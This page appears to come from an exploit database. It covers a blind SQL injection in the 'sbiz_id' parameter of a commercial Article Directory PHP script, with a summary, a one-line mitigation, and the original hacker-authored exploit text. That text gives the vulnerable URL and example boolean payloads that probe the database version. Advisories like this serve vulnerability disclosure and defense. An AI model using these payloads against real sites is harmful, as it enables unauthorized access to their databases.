header-logo
Suggest Exploit
vendor:
Article Directory
by:
BorN To K!LL - h4ck3r
8,8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Article Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Article Directory (sbiz_id) Blind SQL Injection Vuln

The vulnerability exists in the Article Directory script, which allows an attacker to inject malicious SQL queries via the 'sbiz_id' parameter in the 'article_details.php' script. An example of exploiting this vulnerability is by sending a request with the 'sbiz_id' parameter set to '13 and substring(version(),1,1)=4' to check if the version of the database is 4, and if it is not, sending a request with the 'sbiz_id' parameter set to '13 and substring(version(),1,1)=5' to check if the version of the database is 5.

Mitigation:

The best way to mitigate this vulnerability is to sanitize user input and use parameterized queries.
Source

Exploit-DB raw data:

===========================================================
[~] Title: Article Directory (sbiz_id) Blind SQL Injection Vuln
[~] Script: Article Directory
[~] Price: $65
[~] Link: http://www.softbizscripts.com/article-management-script.php
===========================================================
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
===========================================================
[~] 3xploit:
/article_details.php?sbiz_id=[Blind-Injection]

[~] Example:
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=4    // False ,,
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=5    // True ,,
===========================================================
[~] Greetings:
bool Greetings = True;
if (Greetings = True)
{
    cout<<"Dr.2"
          <<"Q8 H4x0r"
          <<"Dr.Faustus"
          <<"AsbMay's Group"
          <<"darkc0de team"
          <<"my wife.."
          <<"and all friends \n";
}
else
{
    cout<<"No greeting ..\n";
}
===========================================================

Navigation

Suggest Exploit

Services By CQR